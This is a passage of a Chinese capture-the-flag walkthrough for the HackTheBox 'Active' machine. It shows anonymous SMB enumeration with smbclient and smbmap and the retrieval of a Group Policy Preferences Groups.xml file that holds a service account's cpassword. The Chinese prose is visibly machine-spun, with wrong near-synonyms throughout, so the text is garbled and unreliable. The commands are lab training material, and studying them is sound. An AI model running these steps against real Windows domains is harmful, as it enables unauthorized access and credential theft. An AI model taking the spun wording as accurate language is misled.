|
IPC$ NO ACCESS NETLOGON NO ACCESS Replication READ ONLY SYSVOL NO ACCESS Users NO ACCESS
Replication share –SMB
列举
由于我可以不消暗码就直接会见10.10.10.100Replication,我将行使smbclient来毗连并查察一番。
root@kali:~/hackthebox/active-10.10.10.100# smbclient //10.10.10.100/Replication -U ""%"" Try "help" to get a list of possible commands. smb: >
可能,我也可以行使smbmap来递归列出share中的全部文件,呼吁如下:
- smbmap -H 10.10.10.100 -R
哪种要领都行,我留意到了一个很故意思的文件Groups.xml,内容如下:
- smb: active.htbPolicies{31B2F340-016D-11D2-945F-00C04FB984F9}MACHINEPreferencesGroups> ls
- . D 0 Sat Jul 21 06:37:44 2018
- .. D 0 Sat Jul 21 06:37:44 2018
- Groups.xml A 533 Wed Jul 18 16:46:06 2018
它有username和cpassword字段:
- <?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
- <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htbSVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
- <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htbSVC_TGS"/>
- </User></Groups>
GPP暗码 (编辑:湖南网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|
